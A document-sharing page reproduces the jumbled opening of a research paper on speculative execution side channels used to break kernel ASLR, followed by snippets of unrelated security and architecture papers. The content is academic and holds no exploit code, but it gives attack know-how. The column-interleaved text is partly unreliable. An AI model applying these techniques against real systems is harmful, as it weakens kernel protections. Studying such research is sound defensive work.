Analyzing the Security Implications of Speculative Execution in Cpus

Total Page:16

File Type:pdf, Size:1020Kb

Analyzing the Security Implications of Speculative Execution in Cpus SPECULOSE: Analyzing the Security Implications of Speculative Execution in CPUs Giorgi Maisuradze Christian Rossow CISPA, Saarland University CISPA, Saarland University Saarland Informatics Campus Saarland Informatics Campus [email protected] [email protected] Abstract—Whenever modern CPUs encounter a conditional and follow the more likely branch target to continue execution. branch for which the condition cannot be evaluated yet, they Upon visiting a particular branch for the first time, CPUs use predict the likely branch target and speculatively execute code. static prediction, which usually guesses that backward jumps Such pipelining is key to optimizing runtime performance and is (common in loops to repeat the loop body) are taken, whereas incorporated in CPUs for more than 15 years. In this paper, forward jumps fall through (common in loops so as not to to the best of our knowledge, we are the first to study the abort the loop). Over time, the CPU will learn the likely inner workings and the security implications of such speculative execution. We revisit the assumption that speculatively executed branch target and then uses dynamic prediction to take the code leaves no traces in case it is not committed. We reveal several more likely target. When a CPU discovers that it mispredicted measurable side effects that allow adversaries to enumerate a branch, it will roll back the speculated instructions and mapped memory pages and to read arbitrary memory—all their results. Despite this risk of mispredictions, speculative using only speculated code that was never fully executed. To execution has significantly sped up CPU performance and is demonstrate the practicality of such attacks, we show how a part of most modern CPUs of popular vendors Intel, AMD or user-space adversary can probe for kernel pages to reliably break ARM-licensed productions. kernel-level ASLR in Linux in under three seconds and reduce the Windows 10 KASLR entropy by 18 bits in less than a second. To the best of our knowledge, we are the first to analyze the security implications of speculative execution. So far, the only known drawback of speculative execution is a slightly higher Disclaimer: This work on speculative execution was con- energy consumption due to non-committed instructions [27]. ducted independently from other research groups and was As we show, its drawbacks go far beyond reduced energy submitted to IEEE S&P ’17 in October 2017. Any techniques efficiency. Our analysis follows the observation that CPUs, and experiments presented in this paper predate the public when executing code speculatively, might leak data from disclosure of attacks that became known as Meltdown [25] the speculated execution branch, although this code would and Spectre [22] and that were released begin-January 2018. never have been executed in a non-speculative world. Ideally, speculated code should not change the CPU state unless it is I. INTRODUCTION committed at a later stage (e.g., because the predicted branch target was confirmed). We analyze how an adversary might Being at the core of any computer system, CPUs have undermine this assumption by causing measurable side effects always strived for maximum execution efficiency. Several during speculative execution. We find that at least two feedback hardware-based efforts have been undertaken to increase CPU channels exist to leak data from speculative execution, even if performance by higher clock frequencies, increasing the num- the speculated code, and thus its results, are never committed. ber of cores, or adding more cache levels. Orthogonal to Whereas one side channel uses our observation that speculated such developments, vendors have long invested in logical code can change cache states, the other side channel observes arXiv:1801.04084v1 [cs.CR] 12 Jan 2018 optimization techniques, such as complex cache eviction al- differences in the time it takes to flush the instruction pipeline. gorithms, branch predictors or instruction reordering. These developments made clear that CPUs do not represent hardware- With these techniques at hand, we then analyze the se- only components any longer. Yet our level of understanding curity implications of the possibility to leak data from within of the algorithmic, i.e., software-side aspects of CPUs is in its speculative execution. We first show how a user-space attacker infancy. Given that many CPU design details remain corporate can abuse speculative execution to reliably read arbitrary user- secrets, it requires tedious reverse engineering attempts to space memory. While this sounds boring at first, we then also understand the inner workings of CPUs [23]. discuss how that might help an attacker to access memory regions that are guarded by conditionals, such as in sandboxes. In this paper, we argue that this is a necessary direction We then analyze if an unprivileged user can use speculation of research and investigate the security implications of one of to read even kernel memory. We show that this attack is the core logical optimization techniques that is ubiquitous in fortunately not possible. That is, speculative execution protects modern CPUs: speculative execution. Whenever facing a con- against invalid reads in that the results of access-violating reads ditional branch for which the outcome is not yet known, instead (e.g., from user to kernel) are zeroed. of waiting (stalling), CPUs usually speculate one of the branch target. This way, CPUs can still fully leverage their instruction This observation, however, leads us to discover a severe pipelines. They predict the outcome of conditional branches side channel that allows one to distinguish between mapped and unmapped kernel pages. In stark contrast to access- attacks that are possible in the absence of KASLR. Later, in violating memory reads (which are zeroed), page faults (i.e., Section IV, we will combine branch prediction and speculative accesses to non-mapped kernel pages) stall the speculative execution to anticipate the speculatively executed path after a execution. We show that an attacker can use this distinction conditional branch. This will be a key to executing arbitrary to reliably and efficiently determine whether a virtual memory code speculatively, which we will use in our attack to remove page is mapped. This effectively undermines a fundamental the randomness introduced by KASLR. assumption of kernel-based Address Space Layout Randomiza- tion (KASLR) designs [10] present in modern OSes (Windows 8.x+, Linux kernel 4.4+, iOS 4.3+, Android 8.x): KASLR’s A. Generic x86 architecture foremost goal is to hide the location of the kernel image, Despite being a CISC (Complex Instruction Set Comput- which is easily broken with speculative execution. Access ing) architecture, x861 constitutes the prevalent architecture violations in speculative execution—in contrast to violations used for desktop and server environments. Extensive optimiza- in non-speculated execution—do not cause program crashes tions are among the reasons for x86’s popularity. due to segmentation faults, allowing one to easily repeat checks in multiple memory ranges. In our experiments, we Realizing the benefits of RISC (Reduced Instruction Set use commodity hardware to show that one can reliably break Computing) architectures, both Intel and AMD have switched KASLR on Ubuntu 16.04 with kernel 4.13.0 in less than three to RISC-like architecture under the hood. That is, although seconds. still providing a complex instruction set to programmers, internally they are translated into sequences of simpler RISC- In this paper, we provide the following contributions: like instructions. These high-level and low-level instructions are usually called macro-OPs and micro-OPs, respectively. • To the best of our knowledge, we are the first to explore This construction brings all the benefits of RISC architecture the internals of speculative execution in modern CPUs. and allows for simpler constructions and better optimizations, We reveal details of branch predictors and speculative ex- while programmers can still use a rich CISC instruction set. ecution in general. Furthermore, we propose two feedback An example of translating macro-OP into micro-OP is shown channels that allow us to transfer data from speculation in the following: to normal execution. We evaluate these primitives on five Intel CPU architectures, ranging from models from 2004 1 load t1,[rax] to recent CPU architectures such as Intel Skylake. 2 add [rax], 1 => add t1, 1 • Based on these new primitives, we discuss potential 3 store[ rax], t1 security implications of speculative execution. We first present how to read arbitrary user-mode memory from Using micro-OPs requires way less circuitry in the CPU for inside speculative execution, which may be useful to read their implementation. For example, similar micro-OPs can be beyond software-enforced memory boundaries. We then grouped together into execution units (also called ports). Such extend this scheme to a (failed) attempt to read arbitrary ports allow micro-OPs from different groups to be executed kernel memory from user space. in parallel, given that one does not depend on the results of • We discover a severe side channel in Intel’s speculative another. The following is an example that can trivially be run execution engine that allows us to distinguish between a in parallel once converted into micro-OPs: mapped and a non-mapped kernel page. We show how we can leverage this concept to break KASLR implementa- 1 mov [rax], 1 tions of modern operating systems, prototyping it against 2 add rbx, 2 the Linux kernel 4.13 and Windows 10. • We discuss potential countermeasures against security degradation caused by speculative execution, ranging Both instructions can be executed in parallel. Whereas instruc- from hardware- and software- to compiler-assisted at- tion #1 is executed in the CPU’s memory unit, instruction #2 tempts to fix the discovered weaknesses. is computed in the CPU’s Arithmetic Logic Unit (ALU)— effectively increasing the throughput of the CPU.
Recommended publications
  • Security Analysis of Docker Containers in a Production Environment
    Security analysis of Docker containers in a production environment Jon-Anders Kabbe Master of Science in Communication Technology Submission date: June 2017 Supervisor: Colin Alexander Boyd, IIK Co-supervisor: Audun Bjørkøy, TIND Technologies Norwegian University of Science and Technology Department of Information Security and Communication Technology Title: Security Analysis of Docker Containers in a Production Environment Student: Jon-Anders Kabbe Problem description: Deployment of Docker containers has achieved its popularity by providing an au- tomatable and stable environment serving a particular application. Docker creates a separate image of a file system with everything the application require during runtime. Containers run atop the regular file system as separate units containing only libraries and tools that particular application require. Docker containers reduce the attack surface, improves process interaction and sim- plifies sandboxing. But containers also raise security concerns, reduced segregation between the operating system and application, out of date or variations in libraries and tools and is still an unsettled technology. Docker containers provide a stable and static environment for applications; this is achieved by creating a static image of only libraries and tools the specific application needs during runtime. Out of date tools and libraries are a major security risk when exposing applications over the Internet, but availability is essential in a competitive market. Does Docker raise some security concerns compared to standard application deploy- ment such as hypervisor-based virtual machines? Is the Docker “best practices” sufficient to secure the container and how does this compare to traditional virtual machine application deployment? Responsible professor: Colin Alexander Boyd, ITEM Supervisor: Audun Bjørkøy, TIND Technologies Abstract Container technology for hosting applications on the web is gaining traction as the preferred mode of deployment.
    [Show full text]
  • Computer Science 246 Computer Architecture Spring 2010 Harvard University
    Computer Science 246 Computer Architecture Spring 2010 Harvard University Instructor: Prof. David Brooks [email protected] Dynamic Branch Prediction, Speculation, and Multiple Issue Computer Science 246 David Brooks Lecture Outline • Tomasulo’s Algorithm Review (3.1-3.3) • Pointer-Based Renaming (MIPS R10000) • Dynamic Branch Prediction (3.4) • Other Front-end Optimizations (3.5) – Branch Target Buffers/Return Address Stack Computer Science 246 David Brooks Tomasulo Review • Reservation Stations – Distribute RAW hazard detection – Renaming eliminates WAW hazards – Buffering values in Reservation Stations removes WARs – Tag match in CDB requires many associative compares • Common Data Bus – Achilles heal of Tomasulo – Multiple writebacks (multiple CDBs) expensive • Load/Store reordering – Load address compared with store address in store buffer Computer Science 246 David Brooks Tomasulo Organization From Mem FP Op FP Registers Queue Load Buffers Load1 Load2 Load3 Load4 Load5 Store Load6 Buffers Add1 Add2 Mult1 Add3 Mult2 Reservation To Mem Stations FP adders FP multipliers Common Data Bus (CDB) Tomasulo Review 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 LD F0, 0(R1) Iss M1 M2 M3 M4 M5 M6 M7 M8 Wb MUL F4, F0, F2 Iss Iss Iss Iss Iss Iss Iss Iss Iss Ex Ex Ex Ex Wb SD 0(R1), F0 Iss Iss Iss Iss Iss Iss Iss Iss Iss Iss Iss Iss Iss M1 M2 M3 Wb SUBI R1, R1, 8 Iss Ex Wb BNEZ R1, Loop Iss Ex Wb LD F0, 0(R1) Iss Iss Iss Iss M Wb MUL F4, F0, F2 Iss Iss Iss Iss Iss Ex Ex Ex Ex Wb SD 0(R1), F0 Iss Iss Iss Iss Iss Iss Iss Iss Iss M1 M2
    [Show full text]
  • The Rise and Imminent Fall of the N-Day Exploit Market in the Cybercriminal Underground
    The Rise and Imminent Fall of the N-Day Exploit Market in the Cybercriminal Underground Mayra Rosario Fuentes and Shiau-Jing Ding Contents TREND MICRO LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and 4 should not be construed to constitute legal advice. The information contained herein may not be applicable to all Introduction situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing 7 herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document Overview of Exploit Developers at any time without prior notice. Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise 12 related to the accuracy of a translation, please refer to the original language official version of the document. Any Overview of Exploit Demand and discrepancies or differences created in the translation are Availability not binding and have no legal effect for compliance or enforcement purposes. Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro 16 makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree Outdated Exploits that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied.
    [Show full text]
  • Sstic-2021-Actes.Pdf
    Préface Mercredi 2 juin 2021, 8 heures du matin. Sous perfusion de café, les yeux à peine entrouverts, je suis avec le reste du comité d’organisation (CO), qui est sur les rangs et veille aux derniers détails, vérifiant que la guicheteuse et les lecteurs de badge fonctionnent. Pendant ce temps, certains irréductibles sont déjà dehors, malgré le crachin breton, prêts à se ruer pour pouvoir découvrir en premier les goodies et s’installer confortablement dans l’amphi, à leur place favorite, pour feuilleter les actes et lire la préface. On ouvre les portes, c’est parti pour le 19e SSTIC ! Fondu. Huit cents personnes dans l’amphi face à nous, je vérifie avec l’orateur invité qui fait l’ouverture que tout est prêt. Avec le trac, les spots qui m’éblouissent, je m’avance pour prononcer quelques mots et lancer la conférence... Et dire qu’il y a environ un tiers de nouveaux ! Fondu. Petit tour en régie, pour discuter avec les techniciens du Couvent et s’assurer que le streaming se passe bien. Oups, on me dit sèchement de m’éloigner de la caméra ; apparemment, les talkies-walkies qui assurent la liaison avec le reste du CO, éparpillé entre le premier rang et l’accueil, font trembler les aimants du stabilisateur... Fondu. Après la présentation des résultats du challenge, une session de rumps réussie où il a fallu courir dans l’amphi pour apporter le micro, nous voilà dans le magnifique cloître du Couvent, sous un soleil bienvenu. Les petits fours sont excellents et je vois, à l’attroupement qui se forme rapidement, que le stand foie gras vient d’ouvrir.
    [Show full text]
  • Area Efficient and Low Power Carry Select Adder Using
    International Journal of Advances in Electronics and Computer Science, ISSN(p): 2394-2835 Volume-6, Issue-7, Jul.-2019 http://iraj.in EVOLUTION OF ANDROID MALWARE OFFENSE AND ANDROID ECOSYSTEM DEFENSE 1NISHANT PANDIT, 2DEEPTI V VIDYARTHI 1Student, Defence Institute of Advanced Technology, Girinagar, Pune, Maharashtra – 411025, India 2Assistant Professor, Defence Institute of Advanced Technology, Girinagar, Pune, Maharashtra – 411025, India E-mail: [email protected], [email protected] Abstract - Android mobile devices are used more and more in everyday life. They are our cameras, wallets, and keys. Basically, they embed most of our private information in our pocket. The paper captures the journey of android malware from being mere revenue generation incentives for the malware developer to stealing the personal data of people using these devices. It also discusses how the open source nature of Android has led to fragmentation of the core Operating System among various device manufacturer which introduces additional vulnerabilities. The non-availability of official Google Play store in some countries led to the emergence of various third party Application market which are largely unregulated in terms of the application verification. Android Operating system itself has come a long way in terms of the security features and fixed vulnerabilities over the course of a decade. Our evaluation shows that the Android System has become quite robust against malware threats and automatic installation of malware is not possible without user intervention. We explore certain simple settings on android which would protect the user from malware threats on Android device. Keywords - Android System, Malware Analysis, Vulnerabilities, Android Fragmentation. I.
    [Show full text]
  • The Shadows of Ghosts Inside the Response of a Unique Carbanak Intrusion
    WHITE PAPER The Shadows of Ghosts Inside the response of a unique Carbanak intrusion By: Jack Wesley Riley – Principal, Incident Response Consultant Table of contents 1 Glossary of terms................................................................................................................ 7 2 Report summary.................................................................................................................. 8 3 Intrusion overview........................................................................................................... 13 3.1 Anatomy of attack..................................................................................................... 13 3.1.1 Phase 1: D+0...................................................................................................... 14 3.1.2 Phase 2: D+0....................................................................................................... 14 3.1.3 Phase 3: D+1 through D+3............................................................................... 16 3.1.4 Phase 4: D+3 through D+25............................................................................ 17 3.1.5 Phase 5: D+25 through D+30.......................................................................... 18 3.1.6 Phase 6: D+30 through D+44.......................................................................... 19 3.2 Detection and response............................................................................................ 19 4 Intrusion details.................................................................................................................
    [Show full text]
  • OS and Compiler Considerations in the Design of the IA-64 Architecture
    OS and Compiler Considerations in the Design of the IA-64 Architecture Rumi Zahir (Intel Corporation) Dale Morris, Jonathan Ross (Hewlett-Packard Company) Drew Hess (Lucasfilm Ltd.) This is an electronic reproduction of “OS and Compiler Considerations in the Design of the IA-64 Architecture” originally published in ASPLOS-IX (the Ninth International Conference on Architectural Support for Programming Languages and Operating Systems) held in Cambridge, MA in November 2000. Copyright © A.C.M. 2000 1-58113-317-0/00/0011...$5.00 Permission to make digital or hard copies of part or all of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full cita- tion on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, to republish, to post on servers, or to redistribute to lists, requires prior specific permis- sion and/or a fee. Request permissions from Publications Dept, ACM Inc., fax +1 (212) 869-0481, or [email protected]. ASPLOS 2000 Cambridge, MA Nov. 12-15 , 2000 212 OS and Compiler Considerations in the Design of the IA-64 Architecture Rumi Zahir Jonathan Ross Dale Morris Drew Hess Intel Corporation Hewlett-Packard Company Lucas Digital Ltd. 2200 Mission College Blvd. 19447 Pruneridge Ave. P.O. Box 2459 Santa Clara, CA 95054 Cupertino, CA 95014 San Rafael, CA 94912 [email protected] [email protected] [email protected] [email protected] ABSTRACT system collaborate to deliver higher-performance systems.
    [Show full text]
  • Selective Eager Execution on the Polypath Architecture
    Selective Eager Execution on the PolyPath Architecture Artur Klauser, Abhijit Paithankar, Dirk Grunwald [klauser,pvega,grunwald]@cs.colorado.edu University of Colorado, Department of Computer Science Boulder, CO 80309-0430 Abstract average misprediction latency is the sum of the architected latency (pipeline depth) and a variable latency, which depends on data de- Control-flow misprediction penalties are a major impediment pendencies of the branch instruction. The overall cycles lost due to high performance in wide-issue superscalar processors. In this to branch mispredictions are the product of the total number of paper we present Selective Eager Execution (SEE), an execution mispredictions incurred during program execution and the average model to overcome mis-speculation penalties by executing both misprediction latency. Thus, reduction of either component helps paths after diffident branches. We present the micro-architecture decrease performance loss due to control mis-speculation. of the PolyPath processor, which is an extension of an aggressive In this paper we propose Selective Eager Execution (SEE) and superscalar, out-of-order architecture. The PolyPath architecture the PolyPath architecture model, which help to overcome branch uses a novel instruction tagging and register renaming mechanism misprediction latency. SEE recognizes the fact that some branches to execute instructions from multiple paths simultaneously in the are predicted more accurately than others, where it draws from re- same processor pipeline, while retaining maximum resource avail- search in branch confidence estimation [4, 6]. SEE behaves like ability for single-path code sequences. a normal monopath speculative execution architecture for highly Results of our execution-driven, pipeline-level simulations predictable branches; it predicts the most likely successor path of a show that SEE can improve performance by as much as 36% for branch, and evaluates instructions only along this path.
    [Show full text]
  • Igpu: Exception Support and Speculative Execution on Gpus
    Appears in the 39th International Symposium on Computer Architecture, 2012 iGPU: Exception Support and Speculative Execution on GPUs Jaikrishnan Menon, Marc de Kruijf, Karthikeyan Sankaralingam Department of Computer Sciences University of Wisconsin-Madison {menon, dekruijf, karu}@cs.wisc.edu Abstract the evolution of traditional CPUs to illuminate why this pro- gression appears natural and imminent. Since the introduction of fully programmable vertex Just as CPU programmers were forced to explicitly man- shader hardware, GPU computing has made tremendous age CPU memories in the days before virtual memory, for advances. Exception support and speculative execution are almost a decade, GPU programmers directly and explicitly the next steps to expand the scope and improve the usabil- managed the GPU memory hierarchy. The recent release ity of GPUs. However, traditional mechanisms to support of NVIDIA’s Fermi architecture and AMD’s Fusion archi- exceptions and speculative execution are highly intrusive to tecture, however, has brought GPUs to an inflection point: GPU hardware design. This paper builds on two related in- both architectures implement a unified address space that sights to provide a unified lightweight mechanism for sup- eliminates the need for explicit memory movement to and porting exceptions and speculation on GPUs. from GPU memory structures. Yet, without demand pag- First, we observe that GPU programs can be broken into ing, something taken for granted in the CPU space, pro- code regions that contain little or no live register state at grammers must still explicitly reason about available mem- their entry point. We then also recognize that it is simple to ory. The drawbacks of exposing physical memory size to generate these regions in such a way that they are idempo- programmers are well known.
    [Show full text]
  • Mobile Threat
    Mobile threat February 2018 David Bird FBCS considers threats via mobile devices and explains why he thinks the future may not be so bright. The unprecedented WannaCry ransomware and subsequent Petya destruct-ware outbreaks have caused mayhem internationally. As a result of a remote execution vulnerability, malware has propagated laterally due to two basic root-causes: (a) out-dated operating systems (OS), and/or (b) in-effective patching regimes. Here we have a commonality with the mobile device domain. There are many older generation devices that have different legacy mobile OSes installed that are no longer supported or updated. Legacy connected Microsoft Pocket PC palmtops and Windows CE or Windows Mobile devices are examples of tech still being used by delivery firms and supermarkets; even though they have been end-of-extended support since 2008 and 2014 respectively. So, do we have a problem? With over two and a half billion smartphones globally in 2016, the market is anticipated to reach at least six billion by 2020 due to the convenience of mobile back-end-as-a-service. Apparently, one vulnerability is disclosed every day, in which 10 per cent of those are critical. This figure does not include the number of internet-enabled tablets that are in circulation; in 2015, there were one billion globally, and this is expected to rise to almost one and a half billion by 2018. Today both Android-centric manufacturers and Apple fight for dominance in the mobile device market - squeezing out Blackberry’s enterprise smartphone monopoly. This has resulted in unsupported Blackberry smart-devices persisting in circulation, closely followed by successive versions of Windows Phone OS - with only 10 left supported.
    [Show full text]
  • A Survey of Published Attacks on Intel
    1 A Survey of Published Attacks on Intel SGX Alexander Nilsson∗y, Pegah Nikbakht Bideh∗, Joakim Brorsson∗zx falexander.nilsson,pegah.nikbakht_bideh,[email protected] ∗Lund University, Department of Electrical and Information Technology, Sweden yAdvenica AB, Sweden zCombitech AB, Sweden xHyker Security AB, Sweden Abstract—Intel Software Guard Extensions (SGX) provides a Unfortunately, a relatively large number of flaws and attacks trusted execution environment (TEE) to run code and operate against SGX have been published by researchers over the last sensitive data. SGX provides runtime hardware protection where few years. both code and data are protected even if other code components are malicious. However, recently many attacks targeting SGX have been identified and introduced that can thwart the hardware A. Contribution defence provided by SGX. In this paper we present a survey of all attacks specifically targeting Intel SGX that are known In this paper, we present the first comprehensive review to the authors, to date. We categorized the attacks based on that includes all known attacks specific to SGX, including their implementation details into 7 different categories. We also controlled channel attacks, cache-attacks, speculative execu- look into the available defence mechanisms against identified tion attacks, branch prediction attacks, rogue data cache loads, attacks and categorize the available types of mitigations for each presented attack. microarchitectural data sampling and software-based fault in- jection attacks. For most of the presented attacks, there are countermeasures and mitigations that have been deployed as microcode patches by Intel or that can be employed by the I. INTRODUCTION application developer herself to make the attack more difficult (or impossible) to exploit.
    [Show full text]
  • SUPPORT for SPECULATIVE EXECUTION in HIGH- PERFORMANCE PROCESSORS Michael David Smith Technical Report: CSL-TR-93456 November 1992
    SUPPORT FOR SPECULATIVE EXECUTION IN HIGH- PERFORMANCE PROCESSORS Michael David Smith Technical Report: CSL-TR-93456 November 1992 Computer Systems Laboratory Departments of Electrical Engineering and Computer Science Stanford University Stanford, California 94305-4055 Abstract Superscalar and superpipelining techniques increase the overlap between the instructions in a pipelined processor, and thus these techniques have the potential to improve processor performance by decreasing the average number of cycles between the execution of adjacent instructions. Yet, to obtain this potential performance benefit, an instruction scheduler for this high-performance processor must find the independent instructions within the instruction stream of an application to execute in parallel. For non-numerical applications, there is an insufficient number of independent instructions within a basic block, and consequently the instruction scheduler must search across the basic block boundaries for the extra instruction-level parallelism required by the superscalar and superpipelining techniques. To exploit instruction-level parallelism across a conditional branch, the instruction scheduler must support the movement of instructions above a conditional branch, and the processor must support the speculative execution of these instructions. We define boosting, an architectural mechanism for speculative execution, that allows us to uncover the instruction-level parallelism across conditional branches without adversely affecting the instruction count of the application
    [Show full text]